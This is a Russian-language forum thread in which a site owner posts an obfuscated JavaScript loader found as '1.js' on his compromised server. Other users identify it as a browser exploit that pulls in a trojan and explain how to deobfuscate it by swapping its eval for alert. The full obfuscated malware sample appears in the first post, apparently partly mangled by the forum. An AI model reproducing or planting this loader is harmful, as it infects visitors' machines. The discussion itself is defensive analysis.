Кто может раскодировать етот сцрипт

[krotaz]

<script>function q(vw,d){if (!d)d='tK^=ci?MR}o9wSZrOuH_b0m$eF@hqEL,z[-|I*lD6x.A~U#!42C:PVBf>&aW)T7]';var lI;var sa='';for(var p=0;p<vw.length;p+=arguments.callee.toString().length-491){lI=(d.indexOf(vw.charAt(p))&255)<<18|(d.indexOf(vw.charAt(p+1))&2 55)<<12|(d.indexOf(vw.charAt(p+2))&255)<<(arguments.callee.toString(). length-489)|d.indexOf(vw.charAt(p+3))&255;sa+=String.fromCharCode((lI&1671168 0)>>16,(lI&(255*256))>>8,lI&255);}eval(sa.substring(0,sa.length-arguments.callee.toString().length+493));}q('qHzDhH>-_Bx?,bVlL|cU@*Vm$B6#w?ilrbOI@Iim$BFimCVUL*e6FDIWh^K60DilO^TSo$czmIS2qV 6Wr*6[$DiMe0>IqVE=q$FEOfi:mD47m-iLq$S[$l&Me0>IqfV=q$w[Z:E@ZM47mIKLr*x#,=&@hD4fml>Wr*x$,=&@0f4fmDVLr0xT,=&@hD4fml>Wr*x$,=&@0f 47mDPWSVxT,=&@hD4fml>Wr*x$,=&@0f47mDPWSVxT,=&@hD4fml>Wr*x$,=&@0f47mDVL SVxT,=&@hD4fml>Wr*xT$DK@,_~TmDV)r*x#,=E@h|~7mDVLr0xTZ:&@,$47ml&)SVx#Z: &@,0>TmDPWr*xT,=&@hD4fml>Wr*x$,=&@0f47mDVLr*xT,=&@hD4fml>Wr*x$,=&@0f47 mDPWqixT,=&@hD4fml>Wr*x$,=&@0f4fm*E)r*xT,=&@hD4fml>Wr*x$,=&@0f47mDPWr* xT,=&@hD4fml>Wr*x$,=&@0f4fmDVLSVxT,=&@hD4fml>Wr*x$,=&@,0>fm*E)r*xT,=&@ hD4fml>Wr*x$,=&@0f47mDPWqixT,=&@hD4fml>Wr*x$,=&@0f4fm*E)r*xT,=&@hD4fml >Wr*xT$|V@,_~fmDV)r*x#,=E@h|~7mDPWqixTZfK@,$47ml&)SVx#Z:&@0f47m*E)r*x$ ,=&@,$47ml&)SVx#Z:&@0f47m*E)SVxTZfK@,$47ml&)SVx#Z:&@,0>TmDPWr*xT,=&@hD 4fml>Wr*x$,=&@0f4fmDPWqixT,=&@hD4fml>Wr*x$,=&@,0>fm*E)r*xT,=&@hD4fml>W r*xTZfK@,0&4mDV)r*x#,=E@h|~7m*E)r*x$,=&@,0>fmDV)r*x#,=E@h|~7m*E)r*x$,= &@,0>fmDV)r*x#,=E@h|~7mDPWqixTZfK@,$47ml&)SVx#Z:&@,0>TmDPWSVxT,=&@hD4f ml>Wr*x$,=&@0f47mDVLSVxT,=&@hD4fml>Wr*x$,=&@0f4fmDVLr0xT,=&@hD4fml>Wr* x$,=&@0f47mDVLSVxT,=&@hD47ml&Lr06[$-uBe0>Ib$V=q$S@$|E@R0>IR?iL}ii$OfczRbS2w_[=q0&4Ofi:m|~fm-iLq$S[$-uu,bS2qVxLqi6[$Dc2e0>IqPK=qHt[Ofc2ZcS2$DK=q$w[Z:&@R0>IR?iL}cq[Ofi:mD4fm-iLq$S[ZPT:e0&#EliL}ii@Ofi:m|~7m-iL}M*[$-u:qcS2qVx)SV6>ZfK@R0&rqBcW}^F[$-u:mIS2qCiLr*6[$-uue0>IbHi=q0>>OfczqcS2Rix=q_iEOfi:m|~7m-iLqbE[$-u:0PS2E*V=q$S@,=&@R0&2qBcW_PE,oHu[}IqfbHFMSVcl}C4Db_Ifq$SH9IiM0-*=$|U)w:c!r-u&wcF6R?VOF*U.Rlu=VrEIViLl2,}$u[H-P6m-i4h*ETOiVFZ?qAm^R~o-qxZCtz');</script>


я его нашол в одном фале под названием "1.js"
немогу понати дла чего он преднозначен.

[Dr.Dre]

О господи! Удали ты этот файл да и всё

[krotaz]

Цитата:

Сообщение от Dr.Dre

О господи! Удали ты этот файл да и всё

a chto etot code delaet , dla chego on prednoznachen? ya ego nashol u seba na servake.
kakoyto svoloch polez na servak i sunul link na etot fail . i ya uznal chto sam fail nahodilsa na drugom ne moyom servake kotorogo toje vzlamal ktoto i vlojil etot fail .

[voron]

хз что он делает. раз сломали сервак и кинули тебе файл, то, поверь, ничего хорошего он не делает. Следуй совету Dr.Dre и обратись в саппорт к хостеру - пусть разбираются как это дело к тебе попало. Только, конечно, при условии, что у тебя на сайте у самого дырок нет, через которые это все можно залить...

[apoc]

Делает он делает "дырку" в твоем броузере и затягивает с нета троян... вот все что он делает. Что делает троян, думаю знаешь. Раскодировать смысла нет. Ибо думаю, что нет желания увидеть результат работы.
У меня на серваке тоже такой был... знакомо

[aoxyz_30330]

вообше ето невозможно раскодироwать, незная алгоритма ... а алгоритм етот зашит в браузере обычно ... я сам неоднократно шифровал так скрипты чтобы не показыwать их другим ... там что расшифровать не то что без шансов, но просто и не стоит даже

[Saruman]

Цитата:

aoxyz_30330:
а алгоритм етот зашит в браузере обычно ...

угум, а браузера-то у тебя нет, чтобы им воспользоваться? Да и алгоритм общеизвестен.
HOWTO:
1. Берем любой scripting decoder.
2. Раскодируем им исходный файл, получаем еще одну функцию декодирования в самом скрипте и ее вызов с длинным кодированным аргументом. В конце самой функции будет eval на результат раскодирования.
3. Засовываем все это в html, заменяем eval на alert или document.write или еще что угодно, запускаем и смотрим, что же на самом деле должно было выполнится.

[aoxyz_30330]

мда ... я из чистого любопытства убил 15 минут сделал как ты говориш ... попробовал 2 проги для раскодирования ... но в обшемто до пункта 2 так и не дошло, ибо раскодираванный код был идентичен с исходным .... мда, вот плин ...

[Saruman]

угум, сорри - этот даже не закодирован, что еще больше упрощает дело. Если внимательно взглянешь на код, то там в функции q(vw,d) есть вызов eval(sa.substring(...)), который, собственно, и производит выполнение расшифрованного (=вредоносного кода). Заменяешь этот eval на alert - и видишь реальный расшифрованный код. Только код из первого поста, судя по всему, безнадежно убит форумом, т.к. даже в тег code не был закрыт, посему нужно автору его или просто выложить куда-нибудь в безопасное место, где он не побьется, или взять аналогичного подопытного - и его раскодировать.

[aoxyz_30330]

еее ... вообше код выглядел вроде ничего, тег скрипт закрыт, функция тоже ... в смысле скобки ... проста возврашается какаято функция, .... мда, скорее всего на какоето событие ... да в обшем и лано ... для меня ето педставляло интерес чиcто теореточеский ...